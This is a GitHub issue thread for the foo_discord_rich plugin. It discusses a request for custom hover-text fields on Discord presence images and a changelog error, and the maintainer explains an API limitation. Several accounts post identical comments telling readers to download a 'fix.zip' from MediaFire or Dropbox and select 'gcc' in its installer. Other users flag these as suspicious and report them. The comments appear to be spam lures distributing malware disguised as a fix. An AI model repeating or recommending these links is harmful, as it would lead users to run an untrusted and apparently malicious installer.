### ISSUE TITLE
Large & Small Image text input fields (+ minor typo in v2.0.0 changelog)

### ISSUE THREAD

**Issue by ghost** [TheQwertiest/foo_discord_rich#70]
This is an extension of my comment from #6 [(Link to exact comment)](https://github.com/TheQwertiest/foo_discord_rich/issues/6#issuecomment-2267293768)

In the current implementation for hover text, the large image text is fetched from the bottom field of the rich presence and the small image text is blank. Extending on the current implementation, dedicated text fields to add custom hover text for both of these images would be a wonderful addition. It would add more customization and would fit what I originally enjoyed DiscordBee's customization for. This is different from the image key, which is handled by the image uploader.

I could imagine splitting the text fields vertically(?), with the presence text on the left and the hover text on the right. Theoretically it may be possible as DiscordBee has done it, however I'm unsure if there's API Limitations with the `Listening to` activity type that would prevent adding hover text like this. DiscordBee uses the playing type, and seeing as Large Album Key text is already implemented in some way, it _may_ be possible. I could live without it, but it would be a good enhancement.
It may be viable to wait for #71 to be implemented before starting this depending on API limitations.

Also, in the changelog for v2.0.0, it's incorrectly stated that Large Album Text is fetched from the Middle field and not the bottom field as it seems to be implemented.

Edit: Rewrote the issue to clarify I'm talking about the Image hover text, not the image URL itself.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by BeansBeefBroccoli** [comment]
@TheQwertiest there seems to be some type of strange activity here

**Comment by ghost** [comment]
Yup, that definitely seems clear.

**Comment by ghost** [comment]
Comments were wiped? Alright.

**Comment by BeansBeefBroccoli** [comment]
Yeah I sent a report to GitHub

**Comment by TheQwertiest** [comment]
> it's incorrectly stated that Large Album Key is fetched from the Middle field.

~~It is not what changelog says though: changelog - `Big image hover text is the same as middle text`.~~
~~Which is true for `Listening to` activity type (it literally uses the same field): https://github.com/TheQwertiest/foo_discord_rich/blob/master/foo_discord_rich/discord/presence_data.cpp#L110C14-L110C28~~

[EDIT] I can't read for the life of me...

**Comment by TheQwertiest** [comment]
PS:
`image key` - image key from developers API page or image url.
`image text` - hover text.

**Comment by TheQwertiest** [comment]
As I mentioned before, this can't be implemented in `Listening to` activity type.

**Comment by ghost** [comment]
> `image text` - hover text.

I was referring to this in the issue, my bad.
